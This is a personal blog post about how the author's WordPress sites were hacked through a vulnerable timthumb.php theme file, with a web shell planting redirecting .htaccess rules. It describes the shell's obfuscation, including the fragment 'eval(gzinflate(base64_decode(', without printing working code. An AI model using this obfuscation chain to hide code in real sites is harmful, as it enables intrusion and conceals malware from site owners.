One of my sites got hacked. How?

  1. My wife tried out a number of WordPress themes while setting up her blog a year or two ago.
  2. One of them contained something called timthumb.php, which just this August was found to have a great big security vulnerability.
  3. Someone exploited this vulnerability, probably by scanning for every possible theme that contained it and put a cracker console in the cache directory of that theme.
  4. They used this console to find and edit every .htaccess on that user account to include a some malicious code. (This was several sites, because I was lazy.)
  5. It redirected to a quite nasty URL whenever a referrer from a longish list of search engines was seen.

So that’s not terribly nice. I take some small comfort in knowing that at least I have a lot of company. Also, I feel validated in moving off WordPress.

The cracker console was actually quite interesting. If you’re curious, you can see it on this gist, slightly expanded for readability (or just a screenshot).

It was obfuscated by being a big string that ran through preg_replace using the e flag, which executes the result. Yes, this is a genuinely insane feature. That turned some unicode-escaped characters at the beginning into eval(gzinflate(base64_decode(', which revealed the rest of the huge string to be a base64 encoded gzipped blob of source code.

The lesson I’m taking from this is: security is hard to enforce when themes that non-technical people are expected to use can contain executable code. Or even technical people… I wouldn’t have caught that if I’d been looking for a WordPress theme.